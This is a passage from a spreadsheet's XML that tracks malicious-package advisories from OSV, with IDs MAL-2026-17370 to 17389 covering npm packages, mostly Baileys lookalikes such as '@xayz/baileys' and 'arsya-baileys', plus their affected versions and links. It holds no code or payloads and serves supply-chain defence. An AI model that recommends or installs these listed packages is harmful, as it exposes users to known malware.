          <t>npm</t>
        </is>
      </c>
      <c r="K695" s="5" t="inlineStr"/>
      <c r="L695" s="5" t="inlineStr">
        <is>
          <t>npm:@nyzzpedia/baileys-new</t>
        </is>
      </c>
      <c r="M695" s="5" t="inlineStr"/>
      <c r="N695" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O695" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P695" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q695" s="5" t="inlineStr"/>
      <c r="R695" s="5" t="inlineStr"/>
      <c r="S69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@nyzzpedia/baileys-new (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T695" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17370</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C696" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17371</t>
        </is>
      </c>
      <c r="D696" s="5" t="inlineStr"/>
      <c r="E696" s="5" t="inlineStr"/>
      <c r="F696" s="5" t="inlineStr"/>
      <c r="G696" s="5" t="inlineStr"/>
      <c r="H696" s="5" t="inlineStr"/>
      <c r="I696" s="5" t="inlineStr"/>
      <c r="J696" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K696" s="5" t="inlineStr"/>
      <c r="L696" s="5" t="inlineStr">
        <is>
          <t>npm:@nyzzpediaa/baileys-new</t>
        </is>
      </c>
      <c r="M696" s="5" t="inlineStr"/>
      <c r="N696" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O696" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P696" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q696" s="5" t="inlineStr"/>
      <c r="R696" s="5" t="inlineStr"/>
      <c r="S69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@nyzzpediaa/baileys-new (npm), version(s): 1.0.12, 1.0.11, 1.0.10, 1.0.9, 1.0.8, 1.0.7, 1.0.6, 1.0.5, 1.0.4, 1.0.3, 1.0.2, 1.0.0.</t>
        </is>
      </c>
      <c r="T696" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17371</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C697" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17372</t>
        </is>
      </c>
      <c r="D697" s="5" t="inlineStr"/>
      <c r="E697" s="5" t="inlineStr"/>
      <c r="F697" s="5" t="inlineStr"/>
      <c r="G697" s="5" t="inlineStr"/>
      <c r="H697" s="5" t="inlineStr"/>
      <c r="I697" s="5" t="inlineStr"/>
      <c r="J697" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K697" s="5" t="inlineStr"/>
      <c r="L697" s="5" t="inlineStr">
        <is>
          <t>npm:@ostyado/baileys</t>
        </is>
      </c>
      <c r="M697" s="5" t="inlineStr"/>
      <c r="N697" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O697" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P697" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q697" s="5" t="inlineStr"/>
      <c r="R697" s="5" t="inlineStr"/>
      <c r="S69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@ostyado/baileys (npm), version(s): 2.0.9, 2.0.8, 2.0.7, 2.0.6.</t>
        </is>
      </c>
      <c r="T697" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17372</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C698" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17373</t>
        </is>
      </c>
      <c r="D698" s="5" t="inlineStr"/>
      <c r="E698" s="5" t="inlineStr"/>
      <c r="F698" s="5" t="inlineStr"/>
      <c r="G698" s="5" t="inlineStr"/>
      <c r="H698" s="5" t="inlineStr"/>
      <c r="I698" s="5" t="inlineStr"/>
      <c r="J698" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K698" s="5" t="inlineStr"/>
      <c r="L698" s="5" t="inlineStr">
        <is>
          <t>npm:@queenanya/baileys</t>
        </is>
      </c>
      <c r="M698" s="5" t="inlineStr"/>
      <c r="N698" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O698" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P698" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q698" s="5" t="inlineStr"/>
      <c r="R698" s="5" t="inlineStr"/>
      <c r="S69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@queenanya/baileys (npm), version(s): 9.10.1, 9.7.3-beta.1, 9.7.2.</t>
        </is>
      </c>
      <c r="T698" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17373</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C699" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17374</t>
        </is>
      </c>
      <c r="D699" s="5" t="inlineStr"/>
      <c r="E699" s="5" t="inlineStr"/>
      <c r="F699" s="5" t="inlineStr"/>
      <c r="G699" s="5" t="inlineStr"/>
      <c r="H699" s="5" t="inlineStr"/>
      <c r="I699" s="5" t="inlineStr"/>
      <c r="J699" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K699" s="5" t="inlineStr"/>
      <c r="L699" s="5" t="inlineStr">
        <is>
          <t>npm:@rennnpm/baileys</t>
        </is>
      </c>
      <c r="M699" s="5" t="inlineStr"/>
      <c r="N699" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O699" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P699" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q699" s="5" t="inlineStr"/>
      <c r="R699" s="5" t="inlineStr"/>
      <c r="S69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@rennnpm/baileys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T699" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17374</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C700" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17375</t>
        </is>
      </c>
      <c r="D700" s="5" t="inlineStr"/>
      <c r="E700" s="5" t="inlineStr"/>
      <c r="F700" s="5" t="inlineStr"/>
      <c r="G700" s="5" t="inlineStr"/>
      <c r="H700" s="5" t="inlineStr"/>
      <c r="I700" s="5" t="inlineStr"/>
      <c r="J700" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K700" s="5" t="inlineStr"/>
      <c r="L700" s="5" t="inlineStr">
        <is>
          <t>npm:@revizahoshii/baileys</t>
        </is>
      </c>
      <c r="M700" s="5" t="inlineStr"/>
      <c r="N700" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O700" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P700" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q700" s="5" t="inlineStr"/>
      <c r="R700" s="5" t="inlineStr"/>
      <c r="S70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@revizahoshii/baileys (npm), version(s): 0.5.4, 0.5.3, 0.5.2, 0.5.1, 0.5.0, 0.4.2, 0.4.1, 0.4.0, 0.3.18.</t>
        </is>
      </c>
      <c r="T700" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17375</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C701" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17376</t>
        </is>
      </c>
      <c r="D701" s="5" t="inlineStr"/>
      <c r="E701" s="5" t="inlineStr"/>
      <c r="F701" s="5" t="inlineStr"/>
      <c r="G701" s="5" t="inlineStr"/>
      <c r="H701" s="5" t="inlineStr"/>
      <c r="I701" s="5" t="inlineStr"/>
      <c r="J701" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K701" s="5" t="inlineStr"/>
      <c r="L701" s="5" t="inlineStr">
        <is>
          <t>npm:@revizahoshii/hoshino</t>
        </is>
      </c>
      <c r="M701" s="5" t="inlineStr"/>
      <c r="N701" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O701" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P701" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q701" s="5" t="inlineStr"/>
      <c r="R701" s="5" t="inlineStr"/>
      <c r="S70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@revizahoshii/hoshino (npm), version(s): 1.1.0.</t>
        </is>
      </c>
      <c r="T701" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17376</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C702" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17377</t>
        </is>
      </c>
      <c r="D702" s="5" t="inlineStr"/>
      <c r="E702" s="5" t="inlineStr"/>
      <c r="F702" s="5" t="inlineStr"/>
      <c r="G702" s="5" t="inlineStr"/>
      <c r="H702" s="5" t="inlineStr"/>
      <c r="I702" s="5" t="inlineStr"/>
      <c r="J702" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K702" s="5" t="inlineStr"/>
      <c r="L702" s="5" t="inlineStr">
        <is>
          <t>npm:@saazkira/baileys</t>
        </is>
      </c>
      <c r="M702" s="5" t="inlineStr"/>
      <c r="N702" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O702" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P702" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q702" s="5" t="inlineStr"/>
      <c r="R702" s="5" t="inlineStr"/>
      <c r="S70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@saazkira/baileys (npm), version(s): 2.1.9, 2.1.8, 2.1.7, 2.1.6.</t>
        </is>
      </c>
      <c r="T702" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17377</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C703" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17378</t>
        </is>
      </c>
      <c r="D703" s="5" t="inlineStr"/>
      <c r="E703" s="5" t="inlineStr"/>
      <c r="F703" s="5" t="inlineStr"/>
      <c r="G703" s="5" t="inlineStr"/>
      <c r="H703" s="5" t="inlineStr"/>
      <c r="I703" s="5" t="inlineStr"/>
      <c r="J703" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K703" s="5" t="inlineStr"/>
      <c r="L703" s="5" t="inlineStr">
        <is>
          <t>npm:@sairidev/baileys-new</t>
        </is>
      </c>
      <c r="M703" s="5" t="inlineStr"/>
      <c r="N703" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O703" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P703" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q703" s="5" t="inlineStr"/>
      <c r="R703" s="5" t="inlineStr"/>
      <c r="S70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@sairidev/baileys-new (npm), version(s): 0.3.21.</t>
        </is>
      </c>
      <c r="T703" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17378</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C704" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17379</t>
        </is>
      </c>
      <c r="D704" s="5" t="inlineStr"/>
      <c r="E704" s="5" t="inlineStr"/>
      <c r="F704" s="5" t="inlineStr"/>
      <c r="G704" s="5" t="inlineStr"/>
      <c r="H704" s="5" t="inlineStr"/>
      <c r="I704" s="5" t="inlineStr"/>
      <c r="J704" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K704" s="5" t="inlineStr"/>
      <c r="L704" s="5" t="inlineStr">
        <is>
          <t>npm:@sakataoffc/baileys</t>
        </is>
      </c>
      <c r="M704" s="5" t="inlineStr"/>
      <c r="N704" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O704" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P704" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q704" s="5" t="inlineStr"/>
      <c r="R704" s="5" t="inlineStr"/>
      <c r="S70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@sakataoffc/baileys (npm), version(s): 8.0.0, 7.0.0, 6.0.0, 5.0.1, 5.0.0, 4.0.0, 3.0.0, 2.0.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T704" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17379</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C705" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17380</t>
        </is>
      </c>
      <c r="D705" s="5" t="inlineStr"/>
      <c r="E705" s="5" t="inlineStr"/>
      <c r="F705" s="5" t="inlineStr"/>
      <c r="G705" s="5" t="inlineStr"/>
      <c r="H705" s="5" t="inlineStr"/>
      <c r="I705" s="5" t="inlineStr"/>
      <c r="J705" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K705" s="5" t="inlineStr"/>
      <c r="L705" s="5" t="inlineStr">
        <is>
          <t>npm:@teamolduser/baileys</t>
        </is>
      </c>
      <c r="M705" s="5" t="inlineStr"/>
      <c r="N705" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O705" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P705" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q705" s="5" t="inlineStr"/>
      <c r="R705" s="5" t="inlineStr"/>
      <c r="S70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@teamolduser/baileys (npm), version(s): 9.10.1, 9.7.3-beta.1, 9.7.2.</t>
        </is>
      </c>
      <c r="T705" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17380</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C706" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17381</t>
        </is>
      </c>
      <c r="D706" s="5" t="inlineStr"/>
      <c r="E706" s="5" t="inlineStr"/>
      <c r="F706" s="5" t="inlineStr"/>
      <c r="G706" s="5" t="inlineStr"/>
      <c r="H706" s="5" t="inlineStr"/>
      <c r="I706" s="5" t="inlineStr"/>
      <c r="J706" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K706" s="5" t="inlineStr"/>
      <c r="L706" s="5" t="inlineStr">
        <is>
          <t>npm:@wanzlonely/bails4u</t>
        </is>
      </c>
      <c r="M706" s="5" t="inlineStr"/>
      <c r="N706" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O706" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P706" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q706" s="5" t="inlineStr"/>
      <c r="R706" s="5" t="inlineStr"/>
      <c r="S70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@wanzlonely/bails4u (npm), version(s): 5.0.0, 4.0.0, 3.0.0, 2.0.0.</t>
        </is>
      </c>
      <c r="T706" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17381</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C707" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17382</t>
        </is>
      </c>
      <c r="D707" s="5" t="inlineStr"/>
      <c r="E707" s="5" t="inlineStr"/>
      <c r="F707" s="5" t="inlineStr"/>
      <c r="G707" s="5" t="inlineStr"/>
      <c r="H707" s="5" t="inlineStr"/>
      <c r="I707" s="5" t="inlineStr"/>
      <c r="J707" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K707" s="5" t="inlineStr"/>
      <c r="L707" s="5" t="inlineStr">
        <is>
          <t>npm:@wenzyx1/bails</t>
        </is>
      </c>
      <c r="M707" s="5" t="inlineStr"/>
      <c r="N707" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O707" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P707" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q707" s="5" t="inlineStr"/>
      <c r="R707" s="5" t="inlineStr"/>
      <c r="S70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@wenzyx1/bails (npm), version(s): 1.0.1, 1.0.0.</t>
        </is>
      </c>
      <c r="T707" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17382</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C708" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17383</t>
        </is>
      </c>
      <c r="D708" s="5" t="inlineStr"/>
      <c r="E708" s="5" t="inlineStr"/>
      <c r="F708" s="5" t="inlineStr"/>
      <c r="G708" s="5" t="inlineStr"/>
      <c r="H708" s="5" t="inlineStr"/>
      <c r="I708" s="5" t="inlineStr"/>
      <c r="J708" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K708" s="5" t="inlineStr"/>
      <c r="L708" s="5" t="inlineStr">
        <is>
          <t>npm:@xatancchii/velycxbail</t>
        </is>
      </c>
      <c r="M708" s="5" t="inlineStr"/>
      <c r="N708" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O708" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P708" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q708" s="5" t="inlineStr"/>
      <c r="R708" s="5" t="inlineStr"/>
      <c r="S70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@xatancchii/velycxbail (npm), version(s): 1.1.0.</t>
        </is>
      </c>
      <c r="T708" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17383</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C709" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17384</t>
        </is>
      </c>
      <c r="D709" s="5" t="inlineStr"/>
      <c r="E709" s="5" t="inlineStr"/>
      <c r="F709" s="5" t="inlineStr"/>
      <c r="G709" s="5" t="inlineStr"/>
      <c r="H709" s="5" t="inlineStr"/>
      <c r="I709" s="5" t="inlineStr"/>
      <c r="J709" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K709" s="5" t="inlineStr"/>
      <c r="L709" s="5" t="inlineStr">
        <is>
          <t>npm:@xayz/baileys</t>
        </is>
      </c>
      <c r="M709" s="5" t="inlineStr"/>
      <c r="N709" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O709" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P709" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q709" s="5" t="inlineStr"/>
      <c r="R709" s="5" t="inlineStr"/>
      <c r="S70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@xayz/baileys (npm), version(s): 6.1.8, 6.1.7, 6.1.6, 6.1.5, 6.1.4, 6.1.3, 6.1.2, 6.1.1, 6.1.0, 6.0.75, 6.0.6, 6.0.5, 6.0.4, 6.0.3, 6.0.2, 6.0.1, 6.0.0, 5.0.0, 4.0.0, 3.0.0.</t>
        </is>
      </c>
      <c r="T709" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17384</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C710" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17385</t>
        </is>
      </c>
      <c r="D710" s="5" t="inlineStr"/>
      <c r="E710" s="5" t="inlineStr"/>
      <c r="F710" s="5" t="inlineStr"/>
      <c r="G710" s="5" t="inlineStr"/>
      <c r="H710" s="5" t="inlineStr"/>
      <c r="I710" s="5" t="inlineStr"/>
      <c r="J710" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K710" s="5" t="inlineStr"/>
      <c r="L710" s="5" t="inlineStr">
        <is>
          <t>npm:albert-anitabaileys</t>
        </is>
      </c>
      <c r="M710" s="5" t="inlineStr"/>
      <c r="N710" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O710" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P710" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q710" s="5" t="inlineStr"/>
      <c r="R710" s="5" t="inlineStr"/>
      <c r="S71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albert-anitabaileys (npm), version(s): 1.1.13.</t>
        </is>
      </c>
      <c r="T710" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17385</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C711" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17386</t>
        </is>
      </c>
      <c r="D711" s="5" t="inlineStr"/>
      <c r="E711" s="5" t="inlineStr"/>
      <c r="F711" s="5" t="inlineStr"/>
      <c r="G711" s="5" t="inlineStr"/>
      <c r="H711" s="5" t="inlineStr"/>
      <c r="I711" s="5" t="inlineStr"/>
      <c r="J711" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K711" s="5" t="inlineStr"/>
      <c r="L711" s="5" t="inlineStr">
        <is>
          <t>npm:anuaja</t>
        </is>
      </c>
      <c r="M711" s="5" t="inlineStr"/>
      <c r="N711" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O711" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P711" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q711" s="5" t="inlineStr"/>
      <c r="R711" s="5" t="inlineStr"/>
      <c r="S71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anuaja (npm), version(s): 1.1.1, 1.1.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T711" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17386</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C712" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17387</t>
        </is>
      </c>
      <c r="D712" s="5" t="inlineStr"/>
      <c r="E712" s="5" t="inlineStr"/>
      <c r="F712" s="5" t="inlineStr"/>
      <c r="G712" s="5" t="inlineStr"/>
      <c r="H712" s="5" t="inlineStr"/>
      <c r="I712" s="5" t="inlineStr"/>
      <c r="J712" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K712" s="5" t="inlineStr"/>
      <c r="L712" s="5" t="inlineStr">
        <is>
          <t>npm:arsya-baileys</t>
        </is>
      </c>
      <c r="M712" s="5" t="inlineStr"/>
      <c r="N712" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O712" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P712" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q712" s="5" t="inlineStr"/>
      <c r="R712" s="5" t="inlineStr"/>
      <c r="S71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arsya-baileys (npm), version(s): 9.2.0.</t>
        </is>
      </c>
      <c r="T712" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17387</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C713" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17388</t>
        </is>
      </c>
      <c r="D713" s="5" t="inlineStr"/>
      <c r="E713" s="5" t="inlineStr"/>
      <c r="F713" s="5" t="inlineStr"/>
      <c r="G713" s="5" t="inlineStr"/>
      <c r="H713" s="5" t="inlineStr"/>
      <c r="I713" s="5" t="inlineStr"/>
      <c r="J713" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K713" s="5" t="inlineStr"/>
      <c r="L713" s="5" t="inlineStr">
        <is>
          <t>npm:baileys-xbats</t>
        </is>
      </c>
      <c r="M713" s="5" t="inlineStr"/>
      <c r="N713" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O713" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P713" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q713" s="5" t="inlineStr"/>
      <c r="R713" s="5" t="inlineStr"/>
      <c r="S71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baileys-xbats (npm), version(s): 1.0.3, 1.0.2, 1.0.1, 1.0.0.</t>
        </is>
      </c>
      <c r="T713" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17388</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C714" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17389</t>
        </is>
      </c>
      <c r="D714" s="5" t="inlineStr"/>
      <c r="E714" s="5" t="inlineStr"/>
      <c r="F714" s="5" t="inlineStr"/>
      <c r="G714" s="5" t="inlineStr"/>
      <c r="H714" s="5" t="inlineStr"/>
      <c r="I714" s="5" t="inlineStr"/>
      <c r="J714" s="5" t="inlineStr">
        <is>
          <t>npm, go</t>
        </is>
      </c>
      <c r="K714" s="5" t="inlineStr"/>
      <c r="L714" s="5" t="inlineStr">
        <is>
